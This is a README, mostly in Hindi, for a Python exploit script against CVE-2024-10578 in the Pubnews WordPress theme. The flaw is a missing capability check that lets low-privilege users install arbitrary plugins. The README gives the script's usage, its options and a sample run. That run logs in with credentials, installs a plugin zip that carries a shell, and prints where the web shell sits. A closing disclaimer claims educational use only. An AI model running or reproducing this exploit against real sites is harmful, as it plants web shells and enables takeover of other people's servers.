
Pubnews <= 1.0.7 - बिना प्रमाणीकरण के मनमाना प्लगइन इंस्टॉलेशन
WordPress के लिए Pubnews थीम, pubnews_importer_plugin_action_for_notice() फ़ंक्शन पर क्षमता जांच की कमी के कारण, 1.0.7 तक (और सहित) सभी संस्करणों में अनधिकृत मनमाना प्लगइन इंस्टॉलेशन के प्रति संवेदनशील है। यह भेद्यता Subscriber-स्तर या उससे ऊपर की पहुँच वाले प्रमाणित हमलावरों को मनमाना प्लगइन्स इंस्टॉल करने की अनुमति देती है, जिनका उपयोग अन्य भेद्यताओं का शोषण करने के लिए किया जा सकता है।
यह स्क्रिप्ट Pubnews थीम में भेद्यता का शोषण करके प्रदान किए गए URL से एक मनमाना प्लगइन इंस्टॉल करती है। प्लगइन में एक दुर्भावनापूर्ण शेल या कोई अन्य पेलोड हो सकता है।
CVE-2024-10578.py [-h] -u URL -un USERNAME -p PASSWORD -url_zip PLUGIN_URL
Pubnews <= 1.0.7 - Unauthenticated Arbitrary Plugin Installation # By Nxploited, Khaled alenazi
options:
-h, --help show this help message and exit
-u, --url URL The URL of the WordPress site
-un, --username USERNAME
The username for WordPress login
-p, --password PASSWORD
The password for WordPress login
-url_zip, --plugin_url PLUGIN_URL
The plugin URL to install (must be a zip file with the shell injected inside)
python
CVE-2024-10578.py -u http://target/wordpress -un admin -p admin -url_zip http://target/shell1.zip
[+] Logged in successfully.
[+] Admin _wpnonce extracted: 6bf22371ab
[+] Plugin installed successfully.
[+] Plugin extracted. You can find the shell here: /wp-content/plugins/shell1/
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है। लेखक इस स्क्रिप्ट के अवैध गतिविधियों में उपयोग का समर्थन नहीं करता। इसका जिम्मेदारी से उपयोग करें और केवल उन्हीं सिस्टम पर उपयोग करें जिनकी जाँच करने की आपको स्पष्ट अनुमति हो।
द्वारा: Nxploited | Khaled Alenazi